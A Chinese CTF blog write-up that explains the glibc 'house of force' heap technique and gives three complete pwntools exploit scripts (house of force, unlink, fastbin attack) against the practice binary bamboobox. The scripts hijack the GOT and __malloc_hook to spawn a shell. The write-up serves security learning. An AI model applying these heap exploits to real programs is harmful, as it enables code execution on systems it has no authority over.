house of force
House of force是一个堆的小利用技巧,要想利用它需要满足两个条件:
1、可以通过溢出修改 top chunk 的 size
2、分配堆的大小没有限制
通过把 top chunk 的size 改的很大,再malloc一个特定的size,使 top chunk 的位置 恰好在目标位置 -0x10 的位置上,再进行分配时,即可分配至目标地址。
那么我认为有一个需要计算的地方就是 malloc_size = target - top_chunk_addr - 0x20
下面拿一个例题来练习 House of force
BUUCTF hitcontraining_bamboobox
这里有三种方法可以写,注意的是用 house of force 只可以打本地,并且要在 /home/bamboobox 目录下放个 /flag,远程并没有这个目录,所以打不了
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./bamboobox') #s = remote('node4.buuoj.cn',26854) elf = ELF('./bamboobox') libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') magic = 0x400D49 def add(length,name): s.recvuntil('Your choice:') s.sendline(b'2') s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the name of item:') s.send(name) def edit(index,length,name): s.recvuntil('Your choice:') s.sendline(b'3') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the new name of the item:') s.send(name) def delete(index): s.recvuntil('Your choice:') s.sendline(b'4') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) def show(): s.recvuntil('Your choice:') s.sendline(b'1') def exit(): s.recvuntil('Your choice:') s.sendline(b'5') add(0x20 ,b'aaaa') #0 payload = b'a'*0x20 + b'a'*0x8 + p64(0xffffffffffffffff) edit(0 ,0x30 ,payload) malloc_size = -0x40 -0x20 add(malloc_size ,b'bbbb') add(0x10 ,p64(magic)*2) exit() #gdb.attach(s) s.interactive()
第二种 unlink
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./bamboobox') #s = remote('node4.buuoj.cn',27420) elf = ELF('./bamboobox') libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') #libc = ELF('./libc-2.23.so') magic = 0x400D49 def add(length,name): s.recvuntil('Your choice:') s.sendline(b'2') s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the name of item:') s.send(name) def edit(index,length,name): s.recvuntil('Your choice:') s.sendline(b'3') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the new name of the item:') s.send(name) def delete(index): s.recvuntil('Your choice:') s.sendline(b'4') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) def show(): s.recvuntil('Your choice:') s.sendline(b'1') add(0x10 ,b'aaaa') #0 add(0x10 ,b'bbbb') #1 add(0x60 ,b'cccc') #2 add(0x80 ,b'dddd') #3 add(0x80 ,b'eeee') #4 add(0x80 ,b'ffff') #5 payload = b'a'*0x10 + p64(0) +p64(0x91) edit(0,0x20,payload) delete(1) add(0x10 ,b'gggg') #1 show() libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 88 -0x10 -libc.sym['__malloc_hook'] system_addr = libc_base + libc.sym['system'] success('libc_base=>' + hex(libc_base)) add(0x60 ,b'hhhh') #6->2 fd = 0x6020c8 +0x30 - 0x18 bk = 0x6020c8 +0x30 - 0x10 payload = p64(0) + p64(0x81) + p64(fd) + p64(bk) + b'a'*0x60 + p64(0x80) +p64(0x90) edit(3,0xa0,payload) delete(4) payload = p64(0) + p64(0) + p64(0) + p64(elf.got['atoi']) edit(3,0x20,payload) edit(3,0x8,p64(system_addr)) #gdb.attach(s) s.recvuntil(b'Your choice:') s.sendline(b'sh') s.interactive()
第三种 fastbin attack
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./bamboobox') libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') magic = 0x400D49 def add(length,name): s.recvuntil('Your choice:') s.sendline(b'2') s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the name of item:') s.send(name) def edit(index,length,name): s.recvuntil('Your choice:') s.sendline(b'3') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) s.recvuntil(b'Please enter the length of item name:') s.sendline(str(length)) s.recvuntil(b'Please enter the new name of the item:') s.send(name) def delete(index): s.recvuntil('Your choice:') s.sendline(b'4') s.recvuntil(b'Please enter the index of item:') s.sendline(str(index)) def show(): s.recvuntil('Your choice:') s.sendline(b'1') add(0x10 ,b'aaaa') #0 add(0x10 ,b'bbbb') #1 add(0x60 ,b'cccc') #2 add(0x10 ,b'dddd') #3 payload = b'a'*0x10 + p64(0) +p64(0x91) edit(0 ,0x20 ,payload) delete(1) add(0x10 ,b'eeee') #1 show() libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['__malloc_hook'] - 0x10 -88 malloc_hook = libc_base + libc.sym['__malloc_hook'] realloc = libc_base + libc.sym['realloc'] onegadget = [0x45206,0x4525a,0xef9f4,0xf0897] one_gadget = libc_base + onegadget[1] success('libc_base=>' + hex(libc_base)) add(0x60 ,b'ffff') #4 delete(4) payload = b'a'*0x10 +p64(0) +p64(0x71) +p64(malloc_hook-0x23) +p64(0) edit(1 ,0x30 ,payload) add(0x60 ,b'gggg') #4 add(0x60 ,b'h'*0xb + p64(one_gadget) + p64(realloc)) s.recvuntil(b'Your choice:') s.sendline(b'2') #gdb.attach(s) s.sendline(str(0x10)) s.interactive() ''' 0x45206 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4525a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xef9f4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf0897 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL '''
本文来自博客园,作者:{狒猩橙},转载请注明原文链接:https://www.cnblogs.com/pwnfeifei/p/15780082.html